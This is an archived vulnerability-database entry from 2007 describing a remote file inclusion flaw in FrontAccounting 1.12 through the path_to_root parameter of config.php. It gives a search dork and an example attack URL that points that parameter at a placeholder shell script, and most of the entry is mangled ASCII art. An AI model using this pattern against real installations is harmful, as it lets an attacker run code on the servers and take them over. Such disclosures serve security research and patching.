FrontAccounting 1.12 Build 31 Remote File Inclusion Vulnerability

2007-08-16T00:00:00
ID SSV:7149
Type seebug
Reporter Root
Modified 2007-08-16T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ?????__________________________________________?????
????????_____________________________________???????
???????????_________________________________????????
??????????????_____________________________?????????
????????????????__________________________??????????
???????????????????______________________???????????
?????????????????????___________________????????????
??????????????????????_________________?????????????
????????????????????????_______________?????????????
??????????????????????????_____________?????????????
___?????????????????????????__________??????????????
_____?????????????????????????________??????????????
________???????????????????????_______??????????????
___________??????????????????????_____??????????????
________________???????????????????___??????????????
_____________________???????????????__??????????????
___________________________????????????????????????_
_____________________???????????????????????????____
______________???????????????????????????????_______
___________???????????????????????????????????______
________????????????????????????????????????????____
______????????_____??????????????????????????????___
____?????????_______??????????????????????????????__
__???????????_______???????????????????????????????_
_?????????????_____?????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
_??????????????????????????????????????????????????_
__?????????????????????????????????????????????????_
_____?????????????????????????????????????????????__
_________????????????????????????????????????????___
_______________??????????????????????????????????___
_________________???????????????????????????????____
_________________???????????????????????????________
________________??????????_____??????????___________
_________________?????_________?????_________?????__
__________????_________????____________?????????____
__________?????????????????_____??????????__________
__________?????????????????___?????_________________
__________?????______??????_________________________

#FrontAccounting  <=  Remote File Inclusion Vulnerability
#
#Dork:"FrontAccounting
#
#Vuln Code
##############################################################################################
#
#ERROR1:config.php
#
#   include_once($path_to_root . "/config_db.php");
#   include_once($path_to_root . "/includes/lang/language.php"); <<< RFI
CODE
#
#
#
#
#BUG1:config.php?path_to_root
#
#Example1:http://site.com/path/config.php?path_to_root=[[Sh3LLScript]]
#
##############################################################################################
#
#http://sourceforge.net/projects/frontaccounting/
#
##############################################################################################
#
#coded by K3ZZAP66345
#
#
#####specialthanx:###..Str0ke..####..KEZZAP66345..####..Wocker..##############################
##############################################################################################

# sebug.net